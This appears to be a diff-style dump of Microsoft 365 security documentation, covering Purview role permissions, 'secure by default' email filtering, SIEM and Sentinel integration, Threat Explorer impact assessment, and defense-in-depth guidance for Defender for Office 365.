-|**Manage Alerts**|View and edit settings and reports for alerts.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator|
-|**Manage Review Set Tags**<sup>\*</sup>|This role lets users create, edit, and delete review set tags for cases they can access.|eDiscovery Manager|
-|**Organization Configuration**|Run, view, and export audit reports and manage compliance policies for DLP, devices, and preservation.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management|
-|**Preview**<sup>\*</sup>|View a list of items that are returned from content searches, and open each item from the list to view its contents.|Data Investigator <br/><br/> eDiscovery Manager|
-|**Privacy Management Admin**<sup>\*</sup>|Manage policies in Privacy Management and has access to all functionality of the solution.|Privacy Management <br/><br/> Privacy Management Administrators|
-|**Privacy Management Analysis**<sup>\*</sup>|Perform investigation and remediation of the message violations in Privacy Management. Can only view messages metadata.|Privacy Management <br/><br/> Privacy Management Analysts|
-|**Privacy Management Investigation**<sup>\*</sup>|Perform investigation, remediation, and review message violations in Privacy Management. Can view message metadata and the full message.|Privacy Management <br/><br/> Privacy Management Investigators|
-|**Privacy Management Permanent contribution**<sup>\*</sup>|Access Privacy Management cases as a permanent contributor.|Privacy Management <br/><br/> Privacy Management Contributors|
-|**Privacy Management Temporary contribution**<sup>\*</sup>|Access Privacy Management cases as a temporary contributor.|Privacy Management <br/><br/> Privacy Management Contributors|
-|**Privacy Management Viewer**<sup>\*</sup>|Access dashboards and widgets in Privacy Management.|Privacy Management <br/><br/> Privacy Management Viewers|
-|**Purview Domain Manager**|Create, edit, and delete domains and perform role assignments.|Purview Administrator|
-|**Purview Evaluation Administrator**<sup>\*</sup>|Create and manage the Microsoft 365 Purview Evaluation lab.|Information Protection <br/><br/> Information Protection Admins <br/><br/> Information Protection Analysts <br/><br/> Information Protection Investigators|
-|**Quarantine**|Allows viewing and releasing quarantined email.|Organization Management <br/><br/> Quarantine Administrator <br/><br/> Security Administrator|
-|**RecordManagement**|View and edit the configuration of the records management feature.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Records Management|
-|**Retention Management**|Manage retention policies, retention labels, and retention label policies. Includes permissions to add and remove adaptive scopes from these policies, and to create, delete, and modify adaptive scopes.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Records Management|
-|**Review**<sup>\*</sup>|This role lets users access review sets in eDiscovery (Premium) cases. Users who are assigned this role can see and open the list of cases on the **eDiscovery \> Advanced** page in the Microsoft Purview compliance portal that they're members of. After the user accesses an eDiscovery (Premium) case, they can select **Review sets** to access case data. This role doesn't allow the user to preview the results of a collection search that's associated with the case or do other search or case management tasks. Users with this role can only access the data in a review set.|Data Investigator <br/><br/> eDiscovery Manager <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Investigators <br/><br/> Reviewer|
-|**RMS Decrypt**<sup>\*</sup>|Decrypt RMS-protected content when exporting search results.|Data Investigator <br/><br/> eDiscovery Manager|
-|**Role Management**|Manage role group membership and create or delete custom role groups.|Organization Management <br/><br/> Purview Administrators|
-|**Scan Reader**<sup>\*</sup>|Read the different scans created in the tenant.|Compliance Administrator <br/><br/> Data Source Administrators <br/><br/> Information Protection <br/><br/> Information Protection Admins <br/><br/> Information Protection Investigators|
-|**Scan Writer**<sup>\*</sup>|Create, update and delete scans in the tenant.|Compliance Administrator <br/><br/> Data Source Administrators|
-|**Scope Manager**|Enables administrators to create, edit, delete, and control access to scoping features such as Adaptive Scopes in the organization.|Communication Compliance <br/><br/> Communication Compliance Administrators <br/><br/> Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> eDiscovery Manager <br/><br/> Organization Management <br/><br/> Records Management|
-|**Search And Purge**|Lets people bulk-remove data that matches the criteria of a content search.|Data Investigator <br/><br/> Organization Management|
-|**Security Administrator**|View and edit the configuration and reports for Security features.|Organization Management <br/><br/> Security Administrator|
-|**Security Reader**|View the configuration and reports for Security features.|Global Reader <br/><br/> Organization Management <br/><br/> Security Operator <br/><br/> Security Reader|
-|**Sensitivity Label Administrator**|View, create, modify, and remove sensitivity labels.|Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Sensitivity Label Reader**|View the configuration and usage of sensitivity labels.|Global Reader <br/><br/> Organization Management <br/><br/> Security Reader|
-|**Service Assurance View**|Download the available documents from the Service Assurance section. Content includes independent auditing, compliance documentation, and trust-related guidance for using Microsoft 365 features to manage regulatory compliance and security risks.|Global Reader <br/><br/> Organization Management <br/><br/> Service Assurance User|
-|**Source Reader**<sup>\*</sup>|Read the different sources created in the tenant.|Compliance Administrator <br/><br/> Data Source Administrators <br/><br/> Information Protection <br/><br/> Information Protection Admins <br/><br/> Information Protection Investigators|
-|**Source Writer**<sup>\*</sup>|Create, update and delete sources in the tenant.|Compliance Administrator <br/><br/> Data Source Administrators|
-|**Subject Rights Request Admin**<sup>\*</sup>|Manage supervisory review policies, including which communications to review and who should perform the review.|Privacy Management <br/><br/> Subject Rights Request Administrators|
-|**Subject Rights Request Approver**<sup>\*</sup>|Create, edit, delete, and control access to custodian.|Subject Rights Request Approvers|
-|**Supervisory Review Administrator**<sup>\*</sup>|Manage supervisory review policies, including which communications to review and who should do the review.|Supervisory Review|
-|**Tag Contributor**|Enables viewing and updating of existing tags.|Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator|
-|**Tag Manager**|View, update, create, and delete user tags.|Organization Management <br/><br/> Security Administrator|
-|**Tag Reader**|Read-only access to existing user tags.|Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator <br/><br/> Security Reader|
-|**Tenant AllowBlockList Manager**<sup>\*</sup>|Manage Tenant Allow/Block List settings.|Security Operator|
-|**View-Only Audit Logs**|View and export audit reports. Because these reports might contain sensitive information, you should only assign this role to people with an explicit need to view this information.|Audit Manager <br/><br/> Audit Reader <br/><br/> Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator|
-|**View-Only Case**||Communication Compliance <br/><br/> Communication Compliance Investigators <br/><br/> Compliance Administrator <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Admins <br/><br/> Insider Risk Management Analysts <br/><br/> Insider Risk Management Investigators <br/><br/> Organization Management <br/><br/> Privacy Management <br/><br/> Privacy Management Administrators <br/><br/> Privacy Management Analysts <br/><br/> Privacy Management Investigators <br/><br/> Subject Rights Request Administrators|
-|**View-Only Device Management**|View the configuration and reports for the Device Management feature.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator <br/><br/> Security Reader|
-|**View-Only DLP Compliance Management**|View the settings and reports for data loss prevention (DLP) policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator <br/><br/> Security Reader|
-|**View-Only IB Compliance Management**|View the configuration and reports for the Information Barriers feature.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator <br/><br/> Security Reader|
-|**View-Only Manage Alerts**|View the configuration and reports for the Manage Alerts feature.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management <br/><br/> Security Administrator <br/><br/> Security Operator <br/><br/> Security Reader|
-|**View-Only Recipients**|View information about users and groups.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> MailFlow Administrator <br/><br/> Organization Management|
-|**View-Only Record Management**|View the configuration of the records management feature.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management|
-|**View-Only Retention Management**|View the configuration of retention policies, retention labels, and retention label policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Global Reader <br/><br/> Organization Management|
security Secure By Default https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/secure-by-default.md
- Title: Secure by default in Office 365
- - NOCSH
--- Previously updated : 01/19/2024-
- - MET150
- - MOE150
-
- - m365-security
- - tier2
- - essentials-security
-description: Learn more about the secure by default setting in Exchange Online Protection (EOP)
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Secure by default in Office 365
--
-"Secure by default" is a term used to define the default settings that are most secure as possible.
-
-However, security needs to be balanced with productivity. This can include balancing across:
--- **Usability**: Settings shouldn't get in the way of user productivity.-- **Risk**: Security might block important activities.-- **Legacy settings**: Some configurations for older products and features might need to be maintained for business reasons, even if new, modern settings are improved.-
-Microsoft 365 organizations with mailboxes in Exchange Online are protected by Exchange Online Protection (EOP). This protection includes:
--- Email with suspected malware will automatically be quarantined. Whether recipients are notified about quarantined malware messages is controlled by the quarantine policy and the settings in the anti-malware policy. For more information, see [Configure anti-malware policies in EOP](anti-malware-policies-configure.md).-- Email identified as high confidence phishing will be handled according to the anti-spam policy action. See [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).-
-For more information about EOP, see [Exchange Online Protection overview](eop-about.md).
-
-Because Microsoft wants to keep our customers secure by default, some tenants overrides aren't applied for malware or high confidence phishing. These overrides include:
--- Allowed sender lists or allowed domain lists (anti-spam policies)-- Outlook Safe Senders-- IP Allow List (connection filtering)-- Exchange mail flow rules (also known as transport rules)-
-If you want to temporarily allow certain messages that are still being blocked by Microsoft, do so using [admin submissions](submissions-admin.md#report-good-email-to-microsoft).
-
-More information on these overrides can be found in [Create safe sender lists](create-safe-sender-lists-in-office-365.md).
-
-> [!NOTE]
-> We have deprecated the **Move message to Junk Email folder** action for a **High confidence phishing email** verdict in EOP anti-spam policies. Anti-spam policies that use this action for high confidence phishing messages will be converted to **Quarantine message**. The **Redirect message to email address** action for high confidence phishing messages is unaffected.
-
-Secure by default isn't a setting that can be turned on or off, but is the way our filtering works out of the box to keep potentially dangerous or unwanted messages out of your mailboxes. Malware and high confidence phishing messages should be quarantined. By default, only admins can manage messages that are quarantined as malware or high confidence phishing, and they can also report false positives to Microsoft from there. For more information, see [Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md).
-
-## More on why we're doing this
-
-The spirit of being secure by default is: we're taking the same action on the message that you would take if you knew the message malicious, even when a configured exception would otherwise allow the message to be delivered. This is the same approach that we've always used on malware, and now we're extending this same behavior to high confidence phishing messages.
-
-Our data indicates that a user is 30 times more likely to click a malicious link in messages in the Junk Email folder versus Quarantine. Our data also indicates that the false positive rate (good messages marked as bad) for high confidence phishing messages is very low, and admins can resolve any false positives with admin submissions.
-
-We also determined that the allowed sender and allowed domain lists in anti-spam policies and Safe Senders in Outlook were too broad and were causing more harm than good.
-
-To put it another way: as a security service, we're acting on your behalf to prevent your users from being compromised.
-
-## Exceptions
-
-You should only consider using overrides in the following scenarios:
--- Phishing simulations: Simulated attacks can help you identify vulnerable users before a real attack impacts your organization. To prevent phishing simulation messages from being filtered, see [Configure third-party phishing simulations in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-third-party-phishing-simulations-in-the-advanced-delivery-policy).-- Security/SecOps mailboxes: Dedicated mailboxes used by security teams to get unfiltered messages (both good and bad). Teams can then review to see if they contain malicious content. For more information, see [Configure SecOps mailboxes in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy).-- Third-party filters: Secure by default applies only when the MX record for your domain points to Microsoft 365 (contoso.mail.protection.outlook.com). If the MX record for your domain points to another service or device, it's possible to override Secure by default with an Exchange mail flow rule to [bypass spam filtering](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl). When your MX record points to another service or device and you use a bypass spam filtering mail flow rule, messages detected as high confidence phishing by Microsoft 365 anti-spam filtering are delivered to the Inbox.-- False positives: To temporarily allow certain messages that are still being blocked by Microsoft, use [admin submissions](submissions-admin.md#report-good-email-to-microsoft). By default, allow entries for domains and email addresses, files, and URLs exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). By default, allow entries for spoofed senders never expire.
security Siem Integration With Office 365 Ti https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/siem-integration-with-office-365-ti.md
- Title: SIEM integration with Microsoft Defender for Office 365
- - NOCSH
----
- - MET150
- - MOE150
Previously updated : 6/20/2023-
- - m365-security
- - tier2
-description: Integrate your organization's SIEM server with Microsoft Defender for Office 365 and related threat events in the Office 365 Activity Management API.
--
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# SIEM integration with Microsoft Defender for Office 365
--
-If your organization is using a security information and event management (SIEM) server, you can integrate Microsoft Defender for Office 365 with your SIEM server. You can set up this integration by using the [Office 365 Activity Management API](/office/office-365-management-api/office-365-management-activity-api-reference).
-
-SIEM integration enables you to view information, such as malware or phish detected by Microsoft Defender for Office 365, in your SIEM server reports.
--- To see an example of SIEM integration with Microsoft Defender for Office 365, see [Tech Community blog: Improve the Effectiveness of your SOC with Defender for Office 365 and the O365 Management API](https://techcommunity.microsoft.com/t5/microsoft-security-and/improve-the-effectiveness-of-your-soc-with-office-365-atp-and/ba-p/1525185).-- To learn more about the Office 365 Management APIs, see [Office 365 Management APIs overview](/office/office-365-management-api/office-365-management-apis-overview).-
-## How SIEM integration works
-
-The Office 365 Activity Management API retrieves information about user, admin, system, and policy actions and events from your organization's Microsoft 365 and Microsoft Entra activity logs. If your organization has Microsoft Defender for Office 365 Plan 1 or 2, or Office 365 E5, you can use the [Microsoft Defender for Office 365 schema](/office/office-365-management-api/office-365-management-activity-api-schema#office-365-advanced-threat-protection-and-threat-investigation-and-response-schema).
-
-Recently, events from automated investigation and response capabilities in [Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) were added to the Office 365 Management Activity API. In addition to including data about core investigation details such as ID, name and status, the API also contains high-level information about investigation actions and entities.
-
-The SIEM server or other similar system polls the **audit.general** workload to access detection events. To learn more, see [Get started with Office 365 Management APIs](/office/office-365-management-api/get-started-with-office-365-management-apis).
-
-## Enum: AuditLogRecordType - Type: Edm.Int32
-
-### AuditLogRecordType
-
-The following table summarizes the values of **AuditLogRecordType** that are relevant for Microsoft Defender for Office 365 events:<br/><br/>
-
-|Value|Member name|Description|
-||||
-|28|ThreatIntelligence|Phishing and malware events from Exchange Online Protection and Microsoft Defender for Office 365.|
-|41|ThreatIntelligenceUrl|Safe Links time-of-block and block override events from Microsoft Defender for Office 365.|
-|47|ThreatIntelligenceAtpContent|Phishing and malware events for files in SharePoint Online, OneDrive for Business, and Microsoft Teams, from Microsoft Defender for Office 365.|
-|64|AirInvestigation|Automated investigation and response events, such as investigation details and relevant artifacts, from Microsoft Defender for Office 365 Plan 2.|
-
-> [!IMPORTANT]
-> You must have either the global administrator or Security Administrator role assigned in the Microsoft Defender portal to set up SIEM integration with Microsoft Defender for Office 365. For more information, see [Permissions in the Microsoft Defender portal](mdo-portal-permissions.md).
->
-> Audit logging must be turned on for your Microsoft 365 environment (it's on by default). To verify that audit logging is turned on or to turn it on, see [Turn auditing on or off](/purview/audit-log-enable-disable).
-
-## See also
-
-[Office 365 threat investigation and response](office-365-ti.md)
-
-[Automated investigation and response (AIR) in Office 365](air-about.md)
security Siem Server Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/siem-server-integration.md
- Title: SIEM server integration with Microsoft 365 services and applications
- - NOCSH
---- Previously updated : 6/20/2023-
- - m365-security
- - tier2
-
- - Ent_Solutions
- - SIEM
- - seo-marvel-apr2020
-description: Get an overview of Security Information and Event Management (SIEM) server integration with your Microsoft 365 cloud services and applications.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Security Information and Event Management (SIEM) server integration with Microsoft 365 services and applications
--
-## Summary
-
-Is your organization using or planning to get a Security Information and Event Management (SIEM) server? You might be wondering how it integrates with Microsoft 365 or Office 365. This article provides a list of resources you can use to integrate your SIEM server with Microsoft 365 services and applications.
-
-> [!TIP]
-> If you don't have a SIEM server yet and are exploring your options, consider **[Microsoft Sentinel](/azure/sentinel/overview)**.
-
-## Do I need a SIEM server?
-
-Whether you need a SIEM server depends on many factors, such as your organization's security requirements and where your data resides. Microsoft 365 includes a wide variety of security features that meet many organizations' security needs without additional servers, such as a SIEM server. Some organizations have special circumstances that require the use of a SIEM server. Here are some examples:
--- *Fabrikam* has some content and applications on premises, and some in the cloud (they have a hybrid cloud deployment). To get security reports for all of their content and applications, Fabrikam implemented a SIEM server.-- *Contoso* is a financial services organization that has stringent security requirements. They added a SIEM server to their environment to take advantage of the extra security protections they require.-
-## SIEM server integration with Microsoft 365
-
-A SIEM server can receive data from a wide variety of Microsoft 365 services and applications. The following table lists several Microsoft 365 services and applications, along with SIEM server inputs and resources to learn more.
-
-|Microsoft 365 Service or Application|SIEM server inputs/methods|Resources to learn more|
-||||
-|[Microsoft Defender for Office 365](mdo-about.md)|Audit logs|[SIEM integration with Microsoft Defender for Office 365](siem-integration-with-office-365-ti.md)|
-|[Microsoft Defender for Endpoint](/windows/security/threat-protection/)|HTTPS endpoint hosted in Azure <p> REST API|[Pull alerts to your SIEM tools](../defender-endpoint/configure-siem.md)|
-|[Microsoft Defender for Cloud Apps](/cloud-app-security/what-is-cloud-app-security)|Log integration|[SIEM integration with Microsoft Defender for Cloud Apps](/cloud-app-security/siem)|
-
-> [!TIP]
-> Take a look at [Microsoft Sentinel](/azure/sentinel/overview). Microsoft Sentinel comes with connectors for Microsoft solutions. These connectors are available "out of the box" and provide for real-time integration. You can use Microsoft Sentinel with your Microsoft Defender XDR solutions and Microsoft 365 services, including Office 365, Microsoft Entra ID, Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, and more.
-
-### Audit logging must be turned on
-
-Make sure that audit logging is turned on before you configure SIEM server integration:
--- For SharePoint, OneDrive, and Microsoft Entra ID, see [Turn auditing on or off](/purview/audit-log-enable-disable).-- For Exchange Online, see [Manage mailbox auditing](/purview/audit-mailboxes).-
-## Integration steps if your SIEM is Microsoft Sentinel
-
-Verify the following requirements:
--- Your current Microsoft 365 subscription (for example, Microsoft Defender for Office 365 Plan 2) allows for Microsoft Sentinel integration.-- Your account in Microsoft Defender for Office 365 or Microsoft Defender XDR is a *Security Administrator*.-- Verify that you have *Write permissions in Microsoft Sentinel*.-
-1. Navigate to Microsoft Sentinel.
-1. On the navigation to the left of the screen **Configuration** \> **Data connectors**.
-1. **Search for** Microsoft Defender XDR and select the **Microsoft Defender XDR (preview) connector**.
-1. On the right of your screen select **Open Connector Page**.
-1. Under **Configuration** \> select **Connect incidents & alerts**
-
- Turn off all Microsoft incident creation rules for the products currently selected.
-
-1. Scroll to **Microsoft Defender for Office 365** in the **Connect events** section of the page.
-
- You can choose tables from *any other Microsoft Defender product* you find helpful and applicable while completing the following final step:
-
-1. Select **EmailEvents**, **EmailUrlInfo**, **EmailAttachmentInfo**, and **EmailPostDeliveryEvents** > and **Apply Changes**.
-
-## More resources
-
-[Integrate security solutions in Microsoft Defender for Cloud](/azure/defender-for-cloud/partner-integration)
-
-[Integrate Microsoft Graph Security API alerts with a SIEM](/graph/security-integration)
security Assess The Impact Of Security Configuration Changes With Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/assess-the-impact-of-security-configuration-changes-with-explorer.md
- Title: Assess the impact of security configuration changes with Explorer
-description: Examples and walk-through of using Explorer to determine the impact of a security control (configuration) change in Microsoft Defender for Office 365.
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 04/04/2024--
-# Assess the impact of security configuration changes with Explorer
-
-Before you make changes to your security configuration, such as policies or transport rules, it's important to understand the impact of those changes so that you can plan and ensure *minimal* disruption to your organization.
-
-This step-by-step guide takes you through assessing a change, and exporting the impacted emails for assessment.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 (included as part of E5).-- Sufficient permissions (Security reader minimum required to assess via Threat Explorer).-- 5-10 minutes to perform the following procedures.-
-## Assess changing normal confidence phish delivery location to quarantine (from the Junk email folder)
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) and navigate to Explorer (underneath *Email & Collaboration* on the left nav) <https://security.microsoft.com/threatexplorer>.
-1. Select **Phish** from the top tab selection (*All email* is the default view).
-1. Press the **filter** button (defaulted to *Sender*) and select **Phish confidence level**.
-1. Select the **Phish confidence level** of **Normal**.
-1. Add an additional **filter** of **Original delivery location** set as **Junk folder**.
-1. Press **Refresh**. Explorer is now filtered to show all the mail that is detected as *normal confidence phish* and gets delivered to the Junk folder due to the settings in the anti-spam policy.
-1. If you wish to pivot the data displayed in the chart, you can do by using the **data slicer top left of the chart (defaulted to *Delivery action*)**, selecting useful data such as **Sender IP**, or **Sender domain** to spot trends and top affected senders.
-1. Below the chart section, where the affected emails are displayed, select **Export email list**, which will generate a CSV for offline analysis. **This is a list of the emails which would be quarantined if the phish action was changed to Quarantine (recommended change for both standard and strict presets)**.
-
-## Assess removing a sender / domain override removal
-
-1. Sign in to the [Microsoft Defender portal](https://security.microsoft.com) and navigate to **Explorer** (underneath Email & Collaboration on the left nav) <https://security.microsoft.com/threatexplorer>.
-1. Select **All email** if not already selected.
-1. Press the **filter** button (defaulted to *Sender*) and add either a sender or sender domain filter, then add the entry where you wish to assess the impact of removal.
-1. Expand the date range to the maximum & press **Refresh** You should now see mail listed if the sender / sending domain is still active in messaging your organization. If *not* you may need to tweak the filter, or alternatively you no longer receive mail from that domain / sender and can remove the entry safely.
-1. If mail is listed, this means the entry is still an active sender. Pivot the data in the chart using the data slicer (defaulted to *Delivery action*) to **Detection technology**.
-1. The chart should refresh, and if it now displays no data, this means we haven't detected any threats on any of the mail previously shown, which indicates an override isn't needed, as there's no detection to override.
-1. If there's data displayed when the data is sliced by **Detection technology**, this means removing the override *would* have impact on this sender / domain due to the protection stack taking action.
-1. You should investigate the mail further to assess if it's truly malicious and the entry can be removed, or if it's a *false positive* and should be remediated so it's no longer incorrectly detected as a threat (authentication is the biggest cause of false positives).
-
-### Further reading
-
-Consider using secure presets [Ensuring you always have the optimal security controls with preset security policies](ensuring-you-always-have-the-optimal-security-controls-with-preset-security-policies.md).
-
-You can also manage email authentication issues with spoof intelligence [Spoof intelligence insight](../anti-spoofing-spoof-intelligence.md).
-
-Learn more about email authentication [Email Authentication in Exchange Online Protection](../email-authentication-about.md).
security Connect Microsoft Defender For Office 365 To Microsoft Sentinel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/connect-microsoft-defender-for-office-365-to-microsoft-sentinel.md
- Title: Connect Microsoft Defender for Office 365 to Microsoft Sentinel
-description: The steps to connect Microsoft Defender for Office 365 to Sentinel. Add your Microsoft Defender for Office 365 data (*and* data from the rest of the Microsoft Defender XDR suite), including incidents, to Microsoft Sentinel for a single pane of glass into your security.
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Connect Microsoft Defender for Office 365 to Microsoft Sentinel
-
-You can ingest your Microsoft Defender for Office 365 data (*and* data from the rest of the Microsoft Defender XDR suite), including incidents, into Microsoft Sentinel.
-
-Take advantage of rich security information events management (SIEM) combined with data from other Microsoft 365 sources, synchronization of incidents and alerts, and advanced hunting.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 2 or higher. (Included in E5 plans)-- Microsoft Sentinel [Quickstart guide](/azure/sentinel/quickstart-onboard).-- Sufficient permissions (Security Administrator in Microsoft 365 & Read / Write permissions in Sentinel).-
-## Add the Microsoft Defender XDR Connector
-
-1. [Sign in to the Azure portal](https://portal.azure.com) and navigate to **Microsoft Sentinel** \> Pick the relevant workspace to integrate with Microsoft Defender XDR.
-1. In the navigation pane, under **Configuration**, go to **Data connectors**.
-1. When the page loads, **search for** Microsoft Defender XDR **and select the Microsoft Defender XDR connector**.
-1. On the right-hand flyout, select **Open Connector Page**.
-1. Under the **Configuration** section of the page that loads, select **Connect incidents & alerts**, leaving **Turn off all Microsoft incident creation rules for these products** selected.
-1. Scroll to **Microsoft Defender for Office 365** in the **Connect events** section of the page. Select **EmailEvents, EmailUrlInfo, EmailAttachmentInfo & EmailPostDeliveryEvents** then **Apply Changes** at the bottom of the page. (Choose tables from other Defender products if helpful and applicable, during this step.)
-
-## Next Steps
-
-Admins are now able to see incidents, alerts, and raw data in Microsoft Sentinel and use this data for *advanced hunting*, pivoting on existing and new data from Microsoft Defender.
-
-## More Information
-
-[Connect Microsoft Defender XDR data to Microsoft Sentinel | Microsoft Docs](/azure/sentinel/connect-microsoft-365-defender?tabs=MDE).
-
-[Connect Microsoft Teams to Microsoft Sentinel](/microsoftteams/teams-sentinel-guide).
security Defense In Depth Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/defense-in-depth-guide.md
- Title: Getting started with defense in-depth configuration for email security
-description: Step-by-step configuration guidance on how to get security value from Microsoft Defender for Office 365 when you have third party email filtering.
-
- - NOCSH
------ m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Getting the best security value from Microsoft Defender for Office 365 when you have third party email filtering
-
-This guide is for you if:
--- You're licensed for Microsoft Defender for Office 365 and host your mailboxes in Office 365-- You're also using a third party for your email security-
-The following information details how to get the most out of your investment, broken down into easy to follow steps.
-
-## What you need
--- Mailboxes hosted in Office 365-- One or more of:
- - Microsoft Defender for Office 365 Plan 1 for protection features
- - Microsoft Defender for Office 365 Plan 2 for most other features (included in E5 plans)
- - Microsoft Defender for Office 365 Trial (available to all customers at aka.ms/tryMDO)
-- Sufficient permissions to configure the features discussed below-
-## Step 1 ΓÇô Understand the value you already have
-
-### Built-in protection features
--- Built-in protection offers a base level of unobtrusive protection, and includes malware, zero day (Safe Attachments), and URL protection (Safe Links) in email (including internal email), SharePoint Online, OneDrive, and Teams. URL protection provided in this state is via API call only. It doesn't wrap or rewrite URLs but does require a supported Outlook client. You can create your own custom policies to expand your protection.-
-**Read more & watch an overview video of Safe Links here:** [Complete Safe Links overview](../safe-links-about.md)
-
-**Read more about Safe Attachments here:** [Safe Attachments](../safe-attachments-about.md)
-
-### Detection, investigation, response, and hunting features
--- When alerts fire in Microsoft Defender for Office 365, they're automatically correlated, and combined into Incidents to help reduce the alert fatigue on security staff. Automated Investigation and Response (AIR) triggers investigations to help remediate and contain threats.-
-**Read more, watch an overview video and get started here :** [Incident response with Microsoft Defender XDR](/microsoft-365/security/defender/incidents-overview)
--- Threat Analytics is our in-product, detailed threat intelligence solution from expert Microsoft security researchers. Threat Analytics contains detailed reports that are designed to get you up to speed on the latest threat groups, attack techniques, how to protect your organization with Indicators of Compromise (IOC) and much more.-
-**Read more, watch an overview video and get started here :** [Threat analytics in Microsoft Defender XDR](../../defender/threat-analytics.md)
--- Explorer can be used to hunt threats, visualize mail flow patterns, spot trends, and identify the impact of changes you make during tuning Defender for Office 365. You can also quickly delete messages from your organization with a few simple clicks.-
-**Read more, and get started here:** [Threat Explorer and Real-time detections](../threat-explorer-real-time-detections-about.md)
-
-## Step 2 ΓÇô Enhance the value further with these simple steps
-
-### Additional protection features
--- Consider enabling policies beyond the built-in Protection. Enabling time-of-click protection, or impersonation protection, for example, to add extra layers or fill gaps missing from your third party protection. If you have a mail flow rule (also known as a transport rule) or connection filter that overrides verdicts (also known as an SCL=-1 rule) you need to address this configuration before turning on other protection features.-
-**Read more here:** [Anti-phishing policies](../anti-phishing-policies-about.md)
--- If your current security provider is configured to modify messages *in any way*, it's important to note that authentication signals can impact the ability for Defender for Office 365 to protect you against attacks such as spoofing. If your third party supports Authenticated Received Chain (ARC), then enabling this is a highly recommended step in your journey to advanced dual filtering. Moving any message modification configuration to Defender for Office 365 is also an alternative.-
-**Read more here:** [Configure trusted ARC sealers.](../email-authentication-arc-configure.md)
--- Enhanced Filtering for connectors allows IP address and sender information to be preserved through the third party. This feature improves accuracy for the filtering (protection) stack, post breach capabilities & authentication improvements.-
-**Read more here:** [Enhanced filtering for connectors in Exchange Online](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors)
